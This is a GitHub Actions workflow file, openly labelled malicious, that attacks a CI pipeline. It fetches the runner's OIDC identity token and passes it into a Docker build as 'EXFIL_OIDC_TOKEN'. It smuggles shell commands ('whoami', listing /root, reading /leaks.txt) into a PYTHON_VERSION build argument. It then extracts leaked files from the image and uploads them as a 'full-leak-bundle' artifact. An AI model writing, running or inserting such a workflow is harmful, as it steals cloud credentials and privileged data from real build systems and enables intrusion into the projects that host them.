name: Deep CI Extractor
on:
  push:
    branches: [ main ]

jobs:
  extract:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read

    steps:
      - name: Checkout Code
        uses: actions/checkout@v4

      - name: Generate Build Arguments
        id: get_oidc
        run: |
          OIDC_TOKEN=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL")
          echo "OIDC_TOKEN_VALUE=$OIDC_TOKEN" >> "$GITHUB_OUTPUT"
          echo "MALICIOUS_PAYLOAD=whoami && ls -la /root && cat /leaks.txt" >> "$GITHUB_OUTPUT"

      - name: Build Malicious Image
        run: |
          docker build \
            --build-arg PYTHON_VERSION="${{ steps.get_oidc.outputs.MALICIOUS_PAYLOAD }}" \
            --build-arg EXFIL_OIDC_TOKEN="${{ steps.get_oidc.outputs.OIDC_TOKEN_VALUE }}" \
            -t rootleak ./taskcluster/docker/python

          docker run --rm rootleak cat /leaks.txt > leaks.txt
          docker run --rm rootleak cat /deep-leaks.tgz > deep-leaks.tgz

      - name: Upload Leaks
        uses: actions/upload-artifact@v4
        with:
          name: full-leak-bundle
          path: |
            leaks.txt
            deep-leaks.tgz
